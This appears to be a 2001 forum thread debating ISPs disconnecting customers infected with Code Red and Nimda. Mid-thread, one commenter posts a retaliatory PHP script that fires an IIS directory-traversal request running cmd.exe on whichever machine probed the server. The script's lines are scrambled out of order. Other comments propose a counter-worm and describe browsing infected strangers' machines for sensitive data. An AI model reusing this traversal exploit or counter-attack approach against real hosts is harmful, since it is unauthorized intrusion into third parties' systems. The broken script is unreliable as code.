This is rediculous. They expect us to walk them step by step on how to find an antivirus program, install it, update it, scan the machine, and remove anything. We also frequently get calls where they expect us to walk them through an ethernet call installation.
As much as I'd like to help out, we just simply do not have the time and will not provide support for such things. Some of these people have a hard time finding the 'Start' button (I once pulled my hair out for 20 minutes trying to help someone find it once, really).
Our policy has always been to contact everyone first, and temporarily disable it later. It's a great policy and I would fist fight anyone who would disagree
Sometimes we send a system wide email to our customers but that does nothing but bog down our phones with people thinking we are going to spend 2 hours fixing their computer on the phone. It may be a crappy thing to do in some peoples eyes, but, if we are providing a good signal to their modem and it is online, that's all I can support (We do spend time on attempting every possible way for them to get their computer to pull an IP, but if it's jacked, theres not much we can do).
Fuck Ajit Pai
If you apply service pack 2 last to Windows 2000, it removes the protection of some previous patches.
(Reality reasserts itself sooner or later.)
They want to run this stupid MS Windoze OS, likely it's pirated anyhow(ever met someone who BOUGHT windows? I haven't), and then they're also too cheap to keep up with paying for Virus software to keep their ShitBox running. If everybody was forced to PAY for windoze, and then they had to go out and BUY additional software so windoze will continue to run, they'd all format and install Linux. I think the new XP is GREAT!!! the anti-piracy feature will surely get many to leave the darkside and join us in our quest for world domination. Shut them down and report them to the link below for Piracy from MS.
"The Most Fun Possible on 4 wheels" is at SunBuggy in Las Vegas
I got this snippet from the free2air.org site. They were discussing a way to redirect anonymous 802.11 surfers to a central webserver.
iptables -t nat -A POSTROUTING -s 10.0.0.0/24 -d 143.207.0.0/16 -p tcp --dport 80 -j DNAT --to 143.207.1.22
That would redirect anything from the 10.0.0.0 subnet on port 80 to
the outside world 143.207.1.22 web server.
I don't think this would be very hard to modify. You would just have to identify who's infected. This is also not very hard.
-Me
Just a note to say that one of our local ISPs does the same thing to users known to be carrying viruses on their machines. My Better Half's machine was cut off from the Net, she had no idea why (she's not computer-savvy), and she only found out after calling the ISP's tech support. To their credit, they really helped fix the problem (infected Outlook Express, of course) to get her back on-line, then I finished the job with Norton antivirus software (which had to be updated before it could even find the virus; kakworm, I think). I still have some problems with the ISP's rationale regarding the customer (shut 'em down and wait for their distress call) but I'm not sure they can realistically do anything else. The amount of infection they deal with is impressive, and they don't have the manpower to telephone so many people every week. They are open to a better solution: anyone have one ?
shut down these bastards. they have no right running something like 2000 or IIS if they are not going to bother to take care of their boxes.
i was so pissed when i looked in my apache logs tuesday morning and saw the fucking virus creep through my class C. assholes....
Website Hosting
This works for any upstream sessions that you initiate, and those downstream sessions that are controlled by e.g. TCP sliding windows.
Downstream bandwidth limits don't help much. If compromized nodes DDoS you from outside, the only thing that helps is to have packet filtering for sources that trigger the alarms based on traffic patterns matching known attacks.
All this downstream packet processing loads your ISPs access router and may easily produce false alarms, filtering traffic that you want to have. Managing the access router filter on a case by case basis from your own node would increase the complexity of the system, so not feasible either.
Seems the ISP just has to cut the troublemakers out if it can to attack the source of the problem
There are three feasible alternatives which high-speed ISPs could take that I can see:
- Leave it alone, and maybe warn clients that they are infected. However, clients will probably get infected faster than they can fix their systems, especially those who don't even know what a web server is.
- Block incoming traffic on port 80 to all clients. Affects all of your clients, even those that are and will not be infected, and most likely gets you a bunch of angry users (which are those who know what they're doing anyway, the ones that ISPs like least).
- Temporarily disable access to the infected clients. You can be SURE you will hear from them VERY soon after their cable modem stops working. This also affects only clients that ARE infected, and is quite easy to automate. If the virus causes so much problems, then I think it's only fair that clients who have compromised systems be disconnected until they fix them.
I was a Videotron cable client until they started "handling" Code Red. Their solution was to suddenly block all incoming traffic to port 80 at their router, which, needless to say, is tough luck for my personal web server. I moved it to another port, but it took me a while to realize it was being blocked, since they did not inform anyone of their new restrictions. That measure has been "temporary" for nearly two months now, and the number of code red infected clients has not dropped. More recently they started blocking incoming traffic on port 25 to all of their cable clients, to "prevent clients from sending spam". That was the last straw, and I switched providers.
"I remember Y1K, every abacus had to get another bead"
Taco - you're assaulting the victims of an external attack on a flawed operating system? Why isn't the ISP at fault then for failing to sniff for Code Plaid packets streaming across their connection?
The nation of Apache users would like to extend our deepest sympathy to citizens of Microsoft IIS. We deeply feel your pain at the loss of over 5000 of your webservers to suicide attacks by nimda pilots.
Of course the fact that 80% of nimba pilots were resident in your nation at the time of the attacks should be no reason for preventing you blaming foreign hackers and nuking them.....
Donte Alistair Anderson Roberts - hi son!
Karma: Chameleon
When a Win98 or NT Workstation (not running IIS) gets infected via an exploited web site, does that workstation start broadcasting out? Or do the workstations just pass the .eml files over the network hoping to infect another IIS system?
I so tire of this whiny, my rights crap.
So do these people still have to pay for the access if the company won't let them use the internet? End user virus protection is not the only kind out there, they could protect themselves and other users by implementing some sort of protection on the network servers. Why don't they just block IIS? Isn't that the only thing affected by the virus? I don't think it's fair to just shut them off, that's the quick and easy thing to do but a "nicer" solution would be my preference.
~ now you know
This is (another) reason not to install any of the many scripts that have been circulating for taking special action against worm probes - like the scripts intended to be installed as /default.ida to do Code Red logging/reporting (or even retaliation). Plenty of ISPs are now scanning for vulnerable machines, and if you make your machine look vulnerable then you'll have a job convincing them to unlock your account.
I know someone who ended up in this situation, and despite his protests that he was actually running Apache and couldn't be vulnerable, the ISP insisted that he "reformat his computer". In the end he was forced to admit defeat (and lie that he'd done so).
On another note, I wonder if the worm blackholeing program mentioned yesterday upsets the ISPs too...
In point c) you say you weren't infected, but in point b) you imply that your net access was cut off. If this is the case, the problem is not that DSL.net is cutting people off, it's that they made a mistake.
-- Never hit a man with glasses. Hit him with a baseball bat.
Because
A) it wastes bandwidth
B) everyone is responsible for security, even moron users who think their computer should be as easy to use as a VCR and never take care of it
C) it costs money to have this extra bandwidth to be used unecessarily
Snippage from e-mail sent to me last night.(Note: I snipped info on how to fix worm, anti-virus software recommendations, and edited to get around filter):
Dear Speakeasy Members,
Over the last 3 months, we have been battling it out with the Code Red worm. Just as we were beginning to believe the worst was behind us, we have now learned that there is yet another hostile bit of rogue data coursing it's way around the Internet.
This new so-called Nimda worm, unlike it's Code Red predecessor, affects not only Windows 2000,NT,XP running IIS, but Windows 95,98,ME as well. It goes without saying that the damage potential for this worm is exponentially greater than the Code Red worm. It is for this reason we
urge you to apply the proper fix to your machines ASAP, if you have not done so already.
PLEASE NOTE:
The affects of this worm are detrimental to all and we'd like to give each member a chance to secure their machines. However, after 9-23-01, Speakeasy's Abuse Team will be freezing the DSL circuit hooked to any machine infected with the worm. We apologize for the inconvenience of
this, but it is imperative that we ensure our network is not assisting in the propogation of this, or any, worm. All of us are part of a larger community, and it really isn't cool to infect your neighbors.
"Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. "
So you're saying that these same users would be fine with another OS because they would know how to patch them? Give me a break, low end users won't know how to patch any OS. And I will predict a higher percentage of viruses for Linux eventually as it gains in populatirity as a home OS the virus writing deviants will start targeting it more. Might be harder, but harder isn't impossible.
"FTP/HTTP Service Setup. Customer should be aware that when using the Service to access the Internet or any other online network or service, there are certain applications, such as FTP (File Transfer Protocol) server or HTTP (Hyper Text Transfer Protocol) server, which may be used to allow other Service users and Internet users to gain access to Customer's computer. If Customer chooses to run such applications, Customer should take the appropriate security measures. Neither AT&T nor @Home Network shall have any liability whatsoever for any claims, losses, actions, damages, suits or proceedings resulting from, arising out of or otherwise relating to the use of such applications by Customer, including without limitation, damages resulting from others accessing Customer's computer."
Free Mac Mini
I'm not a bush supporter, but shutting down households is kinda shutting down nations that harbor terrorists ?
or am I crazy? *yawns - just woke up after having very strange dreams*
Not only does IIS come bundled with 2000 (Pro and Server both), when you install server it turns on IIS, FTP, SMTP, etc on by default. Many users may have installed 2000 Server and not realized that these were turned on. My company discovered this when the Code Red virus hit us. We had a bunch file/COM+/SQL/ Servers that had IIS running and didn't know it.
Microsoft did a stupid, stupid thing here.
Here's a question for the lawyers, or maybe someone at an ISP with a vested interest in the answer..
How do ISP's actions in combating worms, blocking their customers, filtering other people's customers, affect their status as a common carrier? My understanding is a lot of the protections for ISP's in say the Computer Decency Act (for instance protecting against liability for copyright infringement by customers) is based in ISP's status as a common carrier along the same lines as the phone company. If the ISP's start picking and choosing (even where it technologically make sense, I don't want my web servers attacked by this junk) does that jeopardize their status. Does the fact that the worms are attacking the computer, attempting to install back doors, etc., mitigate the impact of the actions?
Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes.
Now, I hate Microsoft shtuff just as much as the next person and have found the answer is to use Linux, but Microsoft fixed these holes MONTHS ago. I am an avid reader of bugtraq and saw it come around way back. Then that patches were released. But NOBODY patched. And this is what they get. Some blame goes to Microsoft for outfitting their users with shit software, but they fixed it, so the majority of the blame goes to the stupid users IMO. Which makes it ok for the DSL provider to shut them down, yes. But lets make sure we know what we're talking about here before blasting others.
...what have you done with the real CmdrTaco, you bastards?
"Encyclopedia" is to "Wikipedia" what "Library" is to "Some people at a bus stop"
i work for a major webhosting company and when the first code-red wave hit our customer's unmanaged servers, we simply assisted them in locating information about patches, provided them with instructions, etc.
however, most of our customers basically ignored our repeated warnings to patch their servers properly and when nimda/blue worm hit our network in the past few days, we simply started shutting down servers. we had given them 2+ months and the patches required to fix these issues had been released by M$ for almost a year. if shutting our customers down is the only way we can raise awareness about these issues, then so be it. we have tried to help them and they just ignore us.
i give up.
IANAL, this may be true in the US, but I SUSPECT in the UK that Microsoft may fall prey to "fit for purpose sold" clause in UK law. If I explicitly told the MS salesperson that I wanted secure web server and they assured me that it was, I am entitled to a refund, OR FOR THEM TO FIX IT, at no charge. This would rule out subscription based patching of servers, they could however refuse to patch, charge customers for their "new" version (i.e. Win 3.11 Vs Win 3.1) that just happens to have the problems fixed.
The real disgrace is that ISPs don't install virus scanning software in their mail servers.
There are a variety of such packages available, and they would stop most of the viruses which are spread via email.
I haven't seen anyone taking the ISPs to task for this so far, and I think now is the time to start demanding that they install it!
Using a computer is a lot like driving a car, from the point of view of responsibility taken. A normal PC is like some family wagon: relatively cheap, quick and quite safe. Running a web-server is a lot like driving an 18-wheeler.
A person who runs a web server has to defend himself fromm all the security risks that he might face, exactly in the same way as a truck driver has to maintain his brake system. Of course, one can get along driving a truck without tuning it all but then what can protect him from wet slopes in stormy weather?
Lots of people install a web server either because they don't bother to look at what they install, or because they think it cool. But web servers are not children's toys; if people aren't aware of the harm they're causing, they must be stopped.
I live in Israel. In the last few days I've been getting quite a lot of internal ISP trafic bound to my port 80 (luckily I run Apache and a firewall). Many of the people from whose IPs (dial-up!) I've been getting connections haven't even bothered to shut down their FTP servers (which were of course MS-FTP). Those morons deserve to be thrown out.
The Internet is a peer-to-peer system where one peer can piss in the public pool.
Hmm, that's a pretty good argument for shutting down Napster, Gnutella et al.
You just can't help yourself. You finally managed to write something completely neutral and you got excited and let your signature anti-Microsoft remark slip by.
Now wait for the backslash from all the users that think they have a God-given right to run a server off their broadband connection. As for myself I run webservers (yes, Microsoft webservers, bite me) but I got a firewall and I block everything, so these are for my own consumption.
Pedro
----
The Insomniac Coder
My God. Today is truly a day that will live in infamy. I know many of you are wary of yahoo links, but this is the real thing.
25,000 dead in Boston... oh, the humanity. After today I would be willing to give up just about any freedoms, as long as it would thwart monsters like these.
Well DUH! Helping people is really nice, but if you'd read the article, the point is that the ISP's haven't been able to get in touch with people! The intent here is NOT to slap people around for being stupid, but to get their attention!! This sh-t has been going on for months now. I say it's about time the ISP's get proactive and start forcing people to wake up and clean up their systems!!!
Your Servant, B. Baggins
You are absolutely correct. I've been running IIS without any extra security, but properly patched, and have watched in amazement as my colleagues shut down their computer and "have to work from home" when they get infected.
Meanwhile, my server is still up, happily rejecting attacks and logging them on a page for me. I've been attacked more than 5000 times by 650 unique servers... it's slowed down to 100 attacks an hour, but for a while there. Yeesh.
One note of caution: Right now, The only complete fix is to format your machine and reinstall the software, then the patch, while offline. People are getting reinfected within 30-60 seconds where I work.
You quitting proves that the karma kap worked. The most annoying of the whores shut up. --CmdrTaco
I don't see this as caring or responsible behaviour by the ISP - I see it as unwelcome nannying.
I hope this is a troll, but I fear it is not.
If I leave the fence to my pool open, and my neighbor's kid walks in, falls into the pool, and drowns himself, I am liable not only for civil but also for criminal damages. If my dog gets loose and injures someone, I am also liable. Why, then, if my computer damages others' machines on the internet, should I not be liable for damages?
What I think needs to happen is this: Any owner of an infected netblock needs to be assessed a charge if their computers damage or disrupt traffic on the Internet. The fines should be commensurate with the amount of damage caused. If I'm a major ISP and I own a large netblock that's affected (even if I sell parts of that netblock off), it should be my responsibility to track down the sources of that disturbance within my network and eradicate it, otherwise I should be punished.
I no longer have any tolerance whatsoever for lazy or complacent admins; fines may finally force people to wake the fuck up and secure their goddamned machines and their networks. I mean, come on! Nimda exploits holes in Windows NT and 2000 that are over six months old, and it's done a pretty damned good job of showing me that there are plenty of clueless admins out there! These admins need to be dealt with, they're making life hard for the rest of us.
You call it nannying. I call it being responsible.
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
Not true. Nimda can propogate via drive shares to a fully-patched machine. Now, granted, putting open shares on the net is stupid. But, I can assure you that at least some of the corporate LANs that are getting thrashed 'cause of this are getting hurt *most* because of the shares propogation.
What if the ISP is responsible for giving the end users the virus? Should they start knocking off users they infected? My University's high traffic webmail servers have been trying to get my Mozilla browser to download readme.exe or readme.eml for three days now (perhaps no one has mentioned a patch to the admins??). A huge percentage of the campus is infected/re-infected daily, and our servers are still dishing this thing out! It would be pretty hipocritical for them to block users even after they patch their system considering their role in the mess.
ôó
Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS
Taco,
I generally look forward to your little comments appended to user submissions. However this is out of line. MS, regardless of how many people hate them, has released a patch for this. Its the users who have the problem. Not that MS is blameless, but calm down before you flame.
I know I'm going to get flamed for this, but Linux has its own security holes too, with plenty of script kiddies out there attempting to exploit them and root your system. The only difference is that the average sysadmin stays on top of things like this.
If 90% of users ran Linux, worms would be written to hit them, and the MS proponents over at seecolon.org would be laughing it up, whining about how Linus doesn't do enough QA, even though its the users fault.
As for shutting down broadband users who have the worm, this is pretty much the only thing you can do. You can't block outgoing traffic to port 80, or they would never be able to download any patches. They should turn them on for a temporary basis after they complain, say for 1 day, and give them the appropriate information to clean their system and install defenses. These guys are on broadband, so they can easily download any patch.
Anyway, thats enough ranting for me. Just remember, while MS is not blameless, think before you start flaming them.
Captain_Frisk
To use the same vulnerabilities as the worm to shutdown the IIS servers of the infected machines..just set it to activate a few hours later so I can propogate before it burns out.
I mean, it won't affect those who have kept up to date, and those who haven't been affected yet, soon will be.
snort + ipchains/iptablez = solution
I'd like to see both Apple and Microsoft expand on this in the future to allow for software updates through an easy to use standalone application. I'd also like to see third party developers get access to the software update systems, so they can offer patches to the users (or at least links to websites with patches).
The Microsoft system is pretty sad, and the closest thing I've seen to the Mac OS update system is cNet's Catchup. But we're still stuck with downloading and applying patches manually.
People with an infectious disease are quarantined. Should they be let out in public just because they are not trained in medicine? Because it is not their fault, and they were just visiting their grand children when they became infected?
The same thing applies here: infected machines need to be quarantined, *especially* if the operators are not trained in administering them properly. And the minimum level of training should be "let Windows Update run periodically."
Leprosy can be cured in a few days with modern medicine. Worms and viruses can be cured in less than that with modern software. So use it, don't spread the problem around.
"Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes."
1- Microsoft has already added a firewall into Windows XP, allowing users to block attackers.
2- Microsoft had patches for these exploits up months ago, for free. Internet Explorer semi-regularly forwards Windows users to an automatic website update that explains they need to patch their OS to install patches that fix problems, including security issues. It is not their fault that the users are directed right to an automated patch utility and CHOOSE TO IGNORE IT ANYWAY!
I would pay extra if my cable provider offered a service to detach my machine from the net once it was obviously compromised.
Sure, if I'm at home in front of the console I might be willing to live with a gaping back door while I'm struggling with isolating the exploit. But most of the time I'm asleep or at work and I don't want my zombified machine out on the 'net getting into trouble.
give credit where credit is due, please.
--
"It is now safe to switch off your computer."
Just for fun, I sometimes browse or nmap the IP addresses the end up in my log from infected machines. With a nimba URL it's fun to browse their boxes for porn and "sensitive" information!
One of the IPs I went to was a "consultancy" that proudly displayed their Microsoft and Cisco certification and a list of retarded services they offer. All done up in FrontPage, of course.
Now, these folks knew how to drum up business -- they had carefully indicated their (Toronto area) phone number in several places, but they didn't have an email address anywhere on the page.
Considering that the rawest beginners usually figure out how to use email (even badly), you'd think a telephone number would be an alternative means of communication for someone offering "PC advice".
On top of that, how am I supposed to email them my sarcastic opinions?
-- clvrmnky
Why not have a server with a cleaning program on...
Before you register for NTL the only webpage you can access is the registration page, can't they do simler for this????
~www.devnull.co.uk
The other day I received an e-mail from a relation of mine which was the SirCam virus in all it glory. Luckily for me I don't use or Windows or Outlook for my e-mail. I told them that they had a virus and that they should try sorting it out. They told me they ran their anti-virus and nothing was detected, so they let me know I was wrong (got to love relations ;). It was only when someone else told them the same thing they came back to me telling me dispite getting the latest anti-virus update nothing could be detected.
Not being in the same country I decided to find some help documents and e-mailed them the references. It was only after they told me they were still stuck that I realised that most of the documents were oriented towards techies and not towards your average Joe, who considers programming the video a nightmare. In the end I told them to either find someone they knew who was good with computers locally or ask their computer shop if they could resolve the problem.
So here is the problem, what is your average Joe meant to do when all the help is targeted at people who aren't technophobic? Unless this can be addressed infected computers are going to stay infected long after the fix is available.
Forgot to mention that my relations are using a 56K connection, in Europe where being connected costs money by the minute, so when your average OS patch is starting to exceed the 20Mb size, it is likely to make some people wonder whether the update is worth the effort.
Jumpstart the tartan drive.
Finally an ISP that has their act together. This Nimda/Code Red and such business is getting out of hand. Just check how many machines it hit worldwide. However, it would be nice to hear more from Microsoft instead of just have them release patches that don't work.
So when are the authorities going to not only FIRE people for purching Msft products, but ARREST & PROSECUTE them for not patching and keeping them worm free and in general from pissing in the public pool? That's what I'd like to see since Msft wants to both 1) publish buggy and patch later 2) market their shiny baubles to the vast computer ignorant laity.
Similarly, there's a certain division of responsibility when someone buys a car - if there are defective parts that might threaten the safety of other drivers (such as tire blowouts), it's the mfg's responsibility to send out recall notices and fix it; but it's also the owners responsbility to operate the vehicle in a safe manner. What happens in the software licensing world is the mfg assumes *NO* responsibility, even for defects that might endanger data or other people's PC's via a network (info 'superhighway').
It gets really bizzare when you consider that software and all rights remains the property
of the authors & publishers, but responsibility for it's misdeeds & FU's are the poor suckers who fell for the slick ads, don't read or understand EULA's, pirate the stuff, etc. That's like GM leasing cars with defective brakes, and holding the operator responsible for all damages that occur when they fail after pulling onto an off ramp and crashing into a child care facility.
try { do() || do_not(); } catch (JediException err) { yoda(err); }
"...Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS..."
Uhhh, MS had a patch out for this quite some time ago. It isn't directly MS's fault (although an argument can be made that they are somewhat to blame). An unpatched and poorly administrated Linux box is just as dangerous as an unpatched and poorly administrated Windows box.
I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe"
/* Check to see if the connection actually opened */
/* URL-encode the message... */
/* ...and send it */
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/syst em32/cmd.exe?/c+$string HTTP/1.0\n\n");
/* close the connection (though it probably got closed automatically) */
/usr/local/apache/httpd.conf, whatever it is) and put this type in like this:
.php .php3 .exe
/tmp/nimba.log.
<?php
/* Open a connection to the offender */
$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
if ($fp)
{
$string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");
fputs ($fp, "GET
fclose ($fp);
}
/* for fun and confusion.. */
header ("HTTP/1.0 404");
echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
echo ("<html><head>\n<title>404 Not Found</title>\n</head></body>\n" );
echo ("<h1>Not Found</h1>\n");
echo ("The requested URL $SCRIPT_NAME was not found on this server.\n");
echo ("</body></html>\n");
echo ("<address>Apache/1.3.20 Server at $SERVER_NAME Port $SERVER_PORT</address>\n");
echo ("</body></html>\n");
$res = "dirty\r\n";
$log = fopen("/tmp/nimda.log", "a");
fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>
Then, (after making sure users can access the file.. try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right?
Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf,
AddType application/x-httpd-php
Now restart Apache by issuing one of either:
/etc/rc.d/init.d/httpd restart
apachectl restart
That should do it, and you're going to have a logfile of all the people who have been warned in
Consider the daffodil. And while you're doing that, I'll be over here, looking through your stuff.
its self defense to some extent
;)
i think at the 'network' level you are free and clear to protect the resources
i don't see that filtering out various ports is any different than the LEC's installing band-pass-filters to shutdown things like "blue-boxes" of yester-year
now, that stated, "content-filtering" is a different matter all together. a port-block is indiscriminate
filtering out content based on some criteria, IMHO, implies some level of responsibility on the part of the ISP -- which is why we don't do it (other than allowing our clients to "opt-out" of banner-ads etc by electing to use a filtering proxy, but it is by no means enforced on the masses.
a well-crafted end user access agreement would go along way to establishing the responsibilities. in the light of this most recent attack, i think i'm going to have ours tuned up so that it includes specific language about temporary disconnects in the case of virii infection
Old age and treachery almost always overcome youth and skill.
is that even patched systems are not clean. Sure, you can patch it, but that doesn't stop the virus. This one is nasty, and patches alone do not fix it. The files on the computer must be cleaned, or infection happens again, and again, and again. I know... We have a box here (and I had all the patches, or at least I thought that I did), and it got infected.... 3 days later, i *think* that it is clean, and patched. So I think shutting down the users is fine.
You will never "find" time for anything. You must "make" it.
I'm a bit old-school, what exactly, prey tell, is the "more recent use of the phrase"? I'm still trying to figure out how tcp/ip could NOT be considered peer-to-peer.
Actually, they've changed the user agreement. It used to state (at least in Columbus, OH) that you couldn't run high bandwidth servers such as games servers, streaming video servers, etc.
Oh well, I guess I'll just switch to DSL when the price comes down another $10 a month.
I'm glad, because during the whole code red fiasco I was sending lists of speakeasy hosts that were infected (that I gathered from my Apache logs) in the hope that they would shut them down.
Now I know the infected hosts will be dealt with one way or another, and I can stop taking the time sending all those emails and actually do something productive.
NT
It's very easy to stop Code Red - turn off the computer, call the ISP, and you are online again.
Lars.
(It's clear that they haven't completely shut down the ports, since I'm still able to connect to my server, but I've only got errors from a few unique IP addresses today. There's no way that many people could have cleaned up their own systems since yesterday...)
Your Servant, B. Baggins
How does that jibe with the following, from http://help.broadband.att.com/legal/violations.jsp ?
Interestingly, I can find no such clause forbidding redistribution in the leasing agreement that you quote (only a clause prohibiting *selling* services). But clearly they believe that running any kind of server is a violation. From http://help.broadband.att.com/faq.jsp?content_id=4 16&category_id=34:
That seems pretty clear to me! Perhaps the leasing agreement isn't the only agreement you're subject to (I notice they also have links to an "acceptable use policy", but they seem not to be accessible by non-AT&T users). In any case, I wouldn't want to have to be in the position of having to argue the point with them after they'd blocked port 80. If you want to run servers, go elsewhere if you have the choice. If that choice isn't exercised, it may eventually diseappear....
--J. Bruce Fields
I don't understand why @home won't reference a database of compromised machines, reroute these customers to a master web server, and display a page saying "YOUR WEB SERVER HAS BEEN COMPROMISED". Then you make the patches available on that server via a link. That way the end user is made aware that instant. No call in costing the ISP money. The end user now has the responsiblity to either look at the pretty blinking red screen or patch their shite. Seems pretty easy to me. It will take a couple of engineers maybe a days work... but then you have to ask what is the cost of the degraded service tech support calls all day from thousands of disgruntled customers?
Just some food for thought
I couldn't fail to disagree with you any less.
People have commented that without an Internet connection, the problem will be hard to fix. Why? Because Microsoft requires infected and at-risk systems be on the Internet to download patches. If Microsoft had done the respectable thing and mailed out patch CDs to registered users (and maybe even given them away at computer stores), much of this could have been avoided.
Speakeasy is going to start cutting people off the 23rd. I have no problem with them doing so. Maybe I should, but I feel more like applauding. Here is the message I received from them, which has some useful URLs. As a result it is long. And, oops, the lameness filter caught it. I will prune this down to the rationale and drop the urls and try again.
My take is that a couple days notice, with resources, is an attempt at being reasonable.
Dear Speakeasy Members,
Over the last 3 months, we have been battling it out with the "Code Red"
worm. Just as we were beginning to believe the worst was behind us, we
have now learned that there is yet another hostile bit of rogue data
coursing it's way around the Internet.
This new so-called "Nimda" worm, unlike it's Code Red predecessor, affects
not only Windows 2000/NT/XP running IIS, but Windows 95/98/ME as well. It
goes without saying that the damage potential for this worm is
exponentially greater than the Code Red worm. It is for this reason we
urge you to apply the proper fix to your machines ASAP -- if you have not
done so already.
Actually, no... The bandwidth belongs to those who setup the backbones and the connections and the routers, etc. The end user *leases* bandwidth from the ISP to get online. Just like a lease on a car, if you screw up that car or otherwise, and it cannot be returned at the end of the lease, you'll have to purchase it outright. Since no one who gets a standard consumer-level ISP account can usually afford to purchase huge pipelines of bandwidth, this is the only other precaution they could take.
I say more ISPs should start shutting down those who are affected until they patch, and if they find subnets full of affected machines that aren't being patched or shut down, block those packets from entering their network.
Human nature is the same everywhere; the modes only are different. -- Earl of Chesterfield
Try changing your zip code to the same city as sone of us who is telling you that we're allowed to run servers - the help pages change based on where your service is coming from.
Try 32225 - Jacksonville, Florida. Formerly MediaOne Roadrunner. Then go look at the service agreements.
We're allowed to run servers, we just can't have AT&T support them.
This space for rent. Call 1-800-STEAK4U
I mean as opposed to peer to peer software like Gnutella or Napster. TCP/IP IS peer to peer, like I said.
No, I don't want a free iPod
And I've tried to get through to them, but no one there is willing to answer the phone. (I have waited over 3 hours on the phone with them in one sitting)
I can imagine that all those that had their service cut off probably can't get it turned on even after they fix their boxes. DSL.Net seems to think 'customer service' is defined by forcing your customers to listen to unbearable hold music for 3 straight hours, still not answering the phone, and not returning any calls left on their voice mail.
I agree with the ISP. Infected hosts can only cause problems. Its not like the info for how to patch hasnt been on every news station world wide.
Also this assumption that people have no idea their running IIS is false. You have to install 200 Server or NT server to get IIS installed by default, and even then it asks you! If you have chosen to load 2000 server or NT server odds are you should be savy enough to patch them.
I can see home users not knowing enough about computers to take the steps to protect themselves. Personally I think that Internet usage should be licensed and anyone unwilling or unable to qualify for the license should be relegated to AOL. Anyone claiming this view is elitist is obviously a candidate for such a fate.
And as far as the companies that post enormously inflated figures on how much these various E-Mail worms will cost them, I say they should go to their network security people and their CIO and ask them hard questions about why the necessary steps were not taken to prevent the outbreak inside the company in the first place. The exploit that Code Red used, for instance, had a patch out for ages before the worm start spreading. Of course, the reason the infrastructure monkeys don't do it is because a lot of them are idiots and the ones who aren't are so overwhelmed that they can barely keep up with other work demands. The CIO makes the decisions on how much staff is necessary to keep the networks not only running smoothly but safely and securely too and if he's not doing his job well, his bonus and possibly his job should be impacted.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
99.9% -- seems a little low to me
________________________________________________
...what do you assume the shelf life of a vanilla Linux/FreeBSD install will be?
Much as I enjoy the painful auto-fellation, put aside the inane OS chest thumping. A savvy user who stays on top of their patches and is security-minded will always be safer than a relatively clueless home user.
Easy does it!
This comment has been submitted already, 276865 hours , 59 minutes ago. No need to try again.
If you install a patch, it should STAY installed. Yet, with the way MS products are cobbled together, when you add a new patch for some other part of the system, you have to re-apply the old patch, IN SOME CASES.
You have to be Kreskin to grok what to do.
The isp could bloch all traffic, but redirect all http traffic to a page which explains the situation and has one link to download a virus cleaner.
:))
Oh, sorry. Also a second link with all the patches for his OS.
Hmm. maybe also an option to have Nessus attack his computer
Privacy is terrorism.
If you leave the phone off the hook long enough without dialing, the central office will drop the circuit and send an alarm signal back. If you busy your line long enough, the phone company will eventually disconnect the circuit. In both cases they rightly view the condition as a fault and free system resources for other clients. ISP's are acting in a similar manner, the important criterion being user intent. The provider makes a judgement call that the circuit isn't being used in a way its owner intended and disables it until a fix is in place. Hang up the phone, run the patch.
just wanted to throw in my 2c... one of my boxes got infected by one of these recent worms and i was at work that whole day so it was just spamming everyone...
but i imagine that my box probably infected others, and that's just not acceptable.
anything these home dsl/cable providers can do which limits the spread of these virii is a Good Thing (TM). except for blocking port 80 permanently on their networks of course... =)
--w
E V E R Y T H I N G I W R I T E I S F A L S E
The explanation from DSL.net was that the worm was saturating the bandwidth, not that I had been cut off. My internet access was spotty or non-existent from last Thursday at 6pm EST until around 2pm EST on Wednesday. DSL.net blamed this on a backup generator failure in NYC, then unspecified hardware failures, and then the Nimda worm.
I know that the comparison goes only that far, but if the gas utility company gets a few reports that there is a gas odor floating around your house, they'll immediately shut down your gas meter. Then, maybe, they'll try to call you. More likely, they'll wait for you to call.
This is considered as a commendable attitude. Safety first. The utility doesn't want other customers to have problems because you are clueless about your gas heater's pilot light.
The real question is: do we want utility companies to refuse to sell us gas until we have passed a HVAC professional certification and are demonstrably competent fixing all gas-burning appliances problem? Of couse not. So by default we accept to be considered morons and to be shut off at the first alert.
Similarly, should ISP mandate system administration training for their $14.99 a month customers? Nope, they shut them off.
And honestly, I prefer to be assumed uncompetent rather than to have countless organization monitor my skills, training and job history.
--
Mad science! Robots! Underwear! Cute girls! Full comic online! http://www.girlgeniusonline.com/
My company runs IIS (yuck) and DSL.net shut off my connection when we got Code Red several weeks ago. I blocked off port 80 in our router and they agreed to restore our connection so I could download the patches (which I had been trying to do for the past 2 days with severely limited bandwidth thanks to Code Red).
:-) I've finally convinced our head admin to start using Linux instead, although he's switching due to Microsoft's stringent licensing contracts (XP) instead of for security reasons.
Funny how my Apache server was just fine.
"With sufficient thrust, pigs fly just fine." -- RFC 1925
The IIS exploit that Nimda used was reported in October of 2000 in MS00-078... Web Server Folder Traversal.
But it references actually having already been patched by MS00-057... File Permission Canonization which was released in August of 2000.
Both of these have been included in various other hotfixes moving forward, including rollup hotfixes thrown together to battle Code Red.
The other IIS exploit was really just to use holes which had been punched in from Code Red. This means that if CR had infected a machine, that machine would need to have been properly cleaned up.
